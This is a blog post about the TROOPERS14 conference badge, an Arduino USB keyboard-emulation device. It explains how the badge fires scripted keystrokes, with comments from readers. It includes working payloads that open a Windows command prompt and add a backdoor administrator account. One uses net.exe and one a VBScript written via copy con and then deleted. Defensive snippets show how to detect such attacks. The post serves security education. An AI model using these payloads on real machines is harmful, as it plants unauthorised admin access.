A TROOPER’s Keyboard

Greetings from the Print Media Academy in Heidelberg. Just in time for TROOPERS14, I’ve got the great honor to present this year’s badge!

Being a TROOPER is tough: You need to know loads of information, learn even more and be able to work fast.

This year we decided to increase your efficiency and speed when collecting data from computer systems and, let’s say, hacking them! Your newest gadget is based on a plain Arduino Leonardo, modded with one of our famous shields. After adding a few LEDs and buttons, it will power up to full functionality.

What does it do? – It turns blue!

Using Arduino’s HID library, some inspiration from Kautilya and stacks of our own ideas, we coded some rather practical firmware. When connected to a USB slot, the badge will turn into a simple keyboard and start typing various commands onto the target system. Let me correct that: as safety goes first, you will have to push a button! The badge is actually a proof of concept device, showing the potential of quick attacks via USB. As it emulates a keyboard, it can type any command into a system that you can think of, and hit special keys and key combos, within just a few seconds.
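That typing speed is also what gives an emulated keyboard away. The following is an added example, not part of the badge firmware: it flags runs of keystrokes that arrive faster than a person types. The 30 ms gap, the 8-key run length and the sample timings are assumptions.

```python
# Added example: flag keystroke bursts too fast for a human typist.
# Thresholds and sample timings are assumptions, not measurements of the badge.

MAX_HUMAN_GAP_MS = 30   # assumed: smaller gaps count as machine-typed
MIN_RUN_LENGTH = 8      # assumed: this many fast keys in a row is suspicious


def summarise(run):
    """Collapse a run of (timestamp_ms, key) into (start_ms, end_ms, text)."""
    return run[0][0], run[-1][0], "".join(key for _, key in run)


def find_injected_runs(events, max_gap_ms=MAX_HUMAN_GAP_MS, min_run=MIN_RUN_LENGTH):
    """events: list of (timestamp_ms, key), sorted by time.
    Returns one (start_ms, end_ms, text) tuple per suspicious run."""
    runs, current = [], []
    for ts, key in events:
        # A pause longer than max_gap_ms ends the current run.
        if current and ts - current[-1][0] > max_gap_ms:
            if len(current) >= min_run:
                runs.append(summarise(current))
            current = []
        current.append((ts, key))
    if len(current) >= min_run:
        runs.append(summarise(current))
    return runs


def synth(text, start_ms, gap_ms):
    """Build constructed key events for `text`, one key every gap_ms."""
    return [(start_ms + i * gap_ms, ch) for i, ch in enumerate(text)]


# Constructed sample: a person typing at 180 ms per key, a fast two-key roll
# (too short to alert), then a device typing a whole line at 5 ms per key.
HUMAN = synth("hello world", 0, 180)
ROLL = synth("ok", 2000, 20)
DEVICE = synth("echo typed-by-device", 2600, 5)

if __name__ == "__main__":
    for start, end, text in find_injected_runs(HUMAN + ROLL + DEVICE):
        print(f"suspicious burst {start}-{end} ms: {text!r}")
```

Firmware can add per-key delays to defeat this check, so treat timing as one signal among several.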

Proof of Concept

The badge is “payload based”: it contains a list of different scripts that can be selected using the LEDs and buttons, and then fired. We actually wrote various little payloads, some friendly, some fun, some evil and aggressive. (Adding users, bricking the OS and downloading malware are just a few thoughts we had.) Due to our credo, Make the World a Safer Place, we decided to give you an impression of what could be done. This resulted in our PoC badge and some further ideas, which are published in this blog post. The badge does not contain any functions that should change anything on your system; just have a closer look at the descriptions further down. Feel free to reflash the badge and give the more dangerous payloads a try, but be cautious as it can have consequences. If you need any hints towards flashing or future use, just give me a visit in the soldering corner.

The Real Thing

In default state (no LEDs or buttons), the badge will type a short string, which you will need to enter your tokens during the conference. Feel free to give it a closer look. In this state, you don’t have any access to the other payloads and can’t really interface with the badge. You will have to grab some parts in the soldering corner and add them to your badge! After adding 8 resistors, 4 LEDs and (probably) two buttons, you’ll be greeted by some friendly blinking. You can now start using the badge properly.

Pressing Buttons and Watching LEDs

When you connect the Badge to your device, the left LED should be switched off and the three LEDs on the right should blink. If only the outer left and right LEDs are switched on, visit the soldering corner! If you press the button on the left, the state of the three LEDs on the right should change to 001 (off – off – on). When pressing the button a few more times, you’ll see a binary counter up to 111, and then back to the blinking state. Each one of these states represents a different payload. The LED on the left is simply a status LED, showing you if the Badge is printing stuff or the serial menu is active.

  1. Serial Menu
  2. Leave Message and lock screen, Windows
  3. Leave Message and lock screen, Mac
  4. Leave Message and lock screen, Unix
  5. Open Troopers Agenda, Windows
  6. Open Troopers Agenda, Mac
  7. Open Troopers Agenda, Linux

To authenticate towards the terminals, you can simply press the right button while the menu LEDs are blinking!

To use the serial menu, just take your favourite flavour of serial client and connect to the Badge! It will talk to you! And you will like it!!!

Different Payloads for Different Operating Systems?

The Badge does just the same as you would when sitting at a computer: using Win+R, Alt+F2 or the Apple button. Three OSs, three combinations for the same functionality. For this simple reason the payloads have to be adapted to each system. Beyond that, there are different levels of, say, exploitability. On Windows, when the user has an admin account, one quite often does not need to enter a password when changing to admin rights using runas. On Linux and Mac, if you use sudo, you usually do need to enter a password. This little password check messes up most payloads for both Mac and Linux.

Using the Badge as Intended

Our intention is to show you what can be done. Your intention should be to either pass this knowledge on to others, or show us what you can do with the Badge. New scripts are easily written, and further content can easily be added to the source. Just sit down and give it a try. If you’ve found a great approach, feel free to show us.

Some Inspiration

//open run
Keyboard.press(KEY_LEFT_GUI);
Keyboard.press('r');
delay(100);
Keyboard.releaseAll();
delay(500);
//open cmd
Keyboard.println(F("cmd"));
//add user using net
Keyboard.println(F("net user Owned 0wn3d /add"));
delay(500);
Keyboard.println(F("net localgroup administrators Owned /add"));
delay(500);
//close console
Keyboard.println(F("exit"));

Now that actually was the very first payload I wrote for our badge. It’s simple, straightforward and most surely done quicker by Badge than by hand! But let’s just imagine that we can’t use net.exe. What do we do? Find a workaround!

//open run
Keyboard.press(KEY_LEFT_GUI);
Keyboard.press('r');
delay(100);
Keyboard.releaseAll();
delay(500);
//open cmd
Keyboard.println(F("cmd"));
delay(500);
//create vb script (backslashes are escaped so "\a" is not read as a C escape)
Keyboard.println(F("copy con %UserProfile%\\adduser.vbs"));
delay(500);
Keyboard.println(F("Set objShell = CreateObject(\"Wscript.Shell\")"));
Keyboard.println(F("Set objEnv = objShell.Environment(\"Process\")"));
Keyboard.println(F("strComputer = objEnv(\"COMPUTERNAME\")"));
Keyboard.println(F("Set colAccounts = GetObject(\"WinNT://\" & strComputer & \",computer\")"));
Keyboard.println(F("Set objUser = colAccounts.Create(\"user\", \"Owned\")"));
Keyboard.println(F("objUser.SetPassword \"0wn3d\""));
Keyboard.println(F("Const ADS_UF_DONT_EXPIRE_PASSWD = &h10000"));
Keyboard.println(F("objPasswordExpirationFlag = ADS_UF_DONT_EXPIRE_PASSWD"));
Keyboard.println(F("objUser.Put \"userFlags 0\", objPasswordExpirationFlag"));
Keyboard.println(F("objUser.SetInfo"));
Keyboard.println(F("Set Group = GetObject(\"WinNT://\" & strComputer & \"/Administrators,group\")"));
Keyboard.println(F("Group.Add(objUser.ADspath)"));
//end the copy con input: Ctrl+Z, then Return
Keyboard.press(KEY_LEFT_CTRL);
Keyboard.press('z');
delay(100);
Keyboard.releaseAll();
delay(100);
Keyboard.press(KEY_RETURN);
delay(100);
Keyboard.releaseAll();

//execute script
Keyboard.println(F("%UserProfile%\\adduser.vbs"));

//clean up
Keyboard.println(F("delete %UserProfile%\\adduser.vbs"));

//close console
Keyboard.println(F("exit"));

Sure, it’s longer, but so what? We’ve got the space, and yet again, it just shows us some base functionality. Win + r is the easiest entry point that there is, and copy con enables us to write data directly into a file, so we’ve got scripting functionality.
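Whichever tool creates the account, net.exe in the first payload or the WinNT provider in the second, a new local account followed by a change to the local Administrators group shows up in the Windows Security log as event 4720 followed by event 4732. The following is an added example, not code from the badge: it correlates the two over constructed records. The 60-second window, the SIDs and the timestamps are assumptions.

```python
# Added example, not badge firmware: correlate "local account created"
# (event ID 4720) with "member added to local group" (event ID 4732).
# All records below are constructed; the account SIDs are made up.
from datetime import datetime, timedelta

ADMINISTRATORS_SID = "S-1-5-32-544"  # well-known SID of BUILTIN\Administrators
USERS_SID = "S-1-5-32-545"           # well-known SID of BUILTIN\Users
WINDOW = timedelta(seconds=60)       # assumed correlation window


def find_fast_admin_creation(events, window=WINDOW):
    """Return (account, created_at, promoted_at) for each account that was
    created and then added to Administrators within `window`."""
    created = {}  # SID of new account -> (name, creation time)
    hits = []
    for ev in sorted(events, key=lambda e: e["time"]):
        if ev["id"] == 4720:
            created[ev["TargetSid"]] = (ev["TargetUserName"], ev["time"])
        elif ev["id"] == 4732 and ev["TargetSid"] == ADMINISTRATORS_SID:
            match = created.get(ev["MemberSid"])
            if match and ev["time"] - match[1] <= window:
                hits.append((match[0], match[1], ev["time"]))
    return hits


def at(hms):
    return datetime.fromisoformat("2014-01-01T" + hms)  # constructed date


def created_ev(hms, name, sid):
    return {"id": 4720, "time": at(hms), "TargetUserName": name, "TargetSid": sid}


def added_ev(hms, group, group_sid, member_sid):
    return {"id": 4732, "time": at(hms), "TargetUserName": group,
            "TargetSid": group_sid, "MemberSid": member_sid}


SAMPLE = [
    created_ev("08:00:00", "svc-backup", "S-1-5-21-1-2-3-1004"),
    created_ev("10:15:02", "Owned", "S-1-5-21-1-2-3-1005"),
    added_ev("10:15:02", "Users", USERS_SID, "S-1-5-21-1-2-3-1005"),
    added_ev("10:15:03", "Administrators", ADMINISTRATORS_SID, "S-1-5-21-1-2-3-1005"),
    added_ev("13:30:00", "Administrators", ADMINISTRATORS_SID, "S-1-5-21-1-2-3-1004"),
]

if __name__ == "__main__":
    for name, made, promoted in find_fast_admin_creation(SAMPLE):
        print(f"ALERT {name}: created {made}, admin {promoted - made} later")
```

Both events are only written when auditing of user account management is enabled on the host.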

The Big Promise

I promised everyone who asked that I’d publish an evil version of the Badge payload. I really want to, and I will try. It’s kind of my very own version of a challenge, so while you’re participating in PacketWars, I’ll be playing Badge Wars! Actually Badge Wars IV, A new Ownage! If you want any further information or instructions, just ask me!

After it’s published, feel free to flash the Badge yourself, but keep in mind that we’ve got some secret bits scripted into our copy of the firmware which is already on your badge! If you wish to keep these, you should stick to our official con firmware till Friday.

The Final Thank You

At this point I just have to thank Sergej Schmidt for contributing various code, ideas and support while setting up the badges. Beyond that, many thanks to Nikhil Mittal for contributing a few really neat payloads from his Kautilya Framework. He actually heard about the Badge’s functionality, came to us and showed me some of his work for me to add!

Have a great evening! And see you all in the Kulturbrauerei!

Badge Wizard,
Brian

Comments

  1. is it possible to post a list of the needed electronic parts – in case I’m going to try and solder it at home ??

    1. Morning,
      yes, sure. Not a problem, added it to my todo list. But… you could also grab a bag of bits in the soldering corner!

  2. Dear Troopers-Team / Badge Wizard,

    Unfortunately I wasn’t able to participate at Troopers14 🙁 , but I had the chance to look on this brilliant badge. I really love it and now I’m even more jealous of my co-worker not only for joining the workshops, conference, packet wars and round table 🙂
    Keep up the great work – hopefully see you next year (and grab an even better badge 2015)
